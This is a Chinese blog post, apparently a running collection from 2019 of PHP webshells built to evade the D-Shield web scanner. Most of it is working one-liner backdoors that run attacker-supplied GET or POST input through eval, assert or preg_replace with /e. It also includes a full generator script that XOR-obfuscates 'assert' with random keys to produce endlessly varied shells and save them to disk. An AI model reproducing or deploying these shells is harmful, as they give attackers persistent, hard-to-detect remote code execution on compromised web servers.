警告
本文最后更新于 2019-08-12,文中内容可能已过时。
准备写一个长期更新的免杀webshell总结
2019-10-12
一个符号bypass
https://forum.90sec.com/t/topic/513/1
1
2
3
4
5
6
7
| <?php
function test($name){#
eval($name);
}
test($_GET['code']);
?>
|
2019-08-15
https://evi1.cn/post/bypass-shell/
1
2
3
| <?php
$a = $_POST['cmd'];
$var = "phpnb {${eval($a)}}";
|
2019-08-12
![https://y4er.com/img/uploads/20190812215816.png]()
2019-08-09
疯狂免杀
![https://y4er.com/img/uploads/20190809144327.png]()
2019-08-07
1
2
3
4
5
6
7
| <?php
function a()
{
return '' + @$_POST['a'];
}
eval(a());
|
再来一个三元表达式的
![https://y4er.com/img/uploads/20190807111622.png]()
2019-08-06
常量过D盾
https://secquan.org/Notes/1069997
1
2
3
4
5
6
7
8
| <?php
sprintf("123");
sprintf("123");
sprintf("123");
$a=$_GET['a'];
define("Test", "$a",true);
assert(TesT);
?>
|
另一种思路反序列化过D盾,代码自己写
再一种思路 创建对象重复定义变量成员过D盾
2019-05-30
ASCII码显示不出来的字符做变量过D盾
https://github.com/th1k404/unishell
http://ascii.911cha.com/
1
2
3
4
5
6
| <?php
if($_GET['␄']){
$␄=$_GET['␄'];
@preg_replace("/abcde/e",$␄, "abcdefg");
}
?>
|
可以自己修改
2019-05-21
https://github.com/yzddmr6/webshell-venom
利用随机异或无限免杀d盾
蚁剑插件版请移步:
https://github.com/yzddmr6/as_webshell_venom
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
| <?php
//code by Mr6
error_reporting(0);
function randomkeys($length)
{
$pattern = '`[email protected]#$%^&*_/+?<>{}|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
for($i=0;$i<$length;$i++)
{
$key[$i]= $pattern{mt_rand(0,strlen($pattern)-1)}; //生成php随机数
}
return $key;
}
function randname($length)
{
$pattern = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
for($i=0;$i<$length;$i++)
{
@$key.= $pattern{mt_rand(0,strlen($pattern)-1)}; //生成php随机数
}
return $key;
}
$str=randomkeys(6);
$bname=randname(4);
$lname=strrev(strtolower($bname));
$str2="assert";
echo "<?php \n";
echo "header('HTTP/1.1 404');\n";
echo "class ".$bname."{ public \$c='';\nfunction __destruct(){\n";
for ($i=0;$i<6;$i++)
{
$name="_".$i;
$str3[$i]=bin2hex($str[$i] ^$str2[$i]);
echo "$"."$name=";
echo "'".$str[$i]."'"."^"."\"\\x".$str3[$i]."\";\n";
}
$aa='$db=$_0.$_1.$_2.$_3.$_4.$_5;';
echo $aa;
echo "\n";
echo '@$db ("$this->c");}}';
echo "\n";
echo "\${$lname}=new {$bname}();\n";
echo "@\${$lname}->c=\$_POST['Mr6'];\n";
echo "?>\n";
@$file=$_GET['file'];
$html = ob_get_contents();
if (isset($file)){
if(file_put_contents($file,$html))
echo "\n\n\n".$file." save success!";}
else {echo "Please input the file name like '?file=xxx.txt'";}
?>
|
2019-05-11
1
2
3
4
5
6
| <?php
function a(){
return $a=$_POST['1'];
}
@assert(a());
?>
|
![https://y4er.com/img/uploads/20190511171755.png]()
1
2
3
4
5
| <?php
$value=$key = "a";
foreach($_POST as $key=>$value){
assert($value);
}
|
![https://y4er.com/img/uploads/20190511183608.png]()
可以发现的规律是当已经定义的变量和循环的变量名一致时,D盾就不是那么敏感了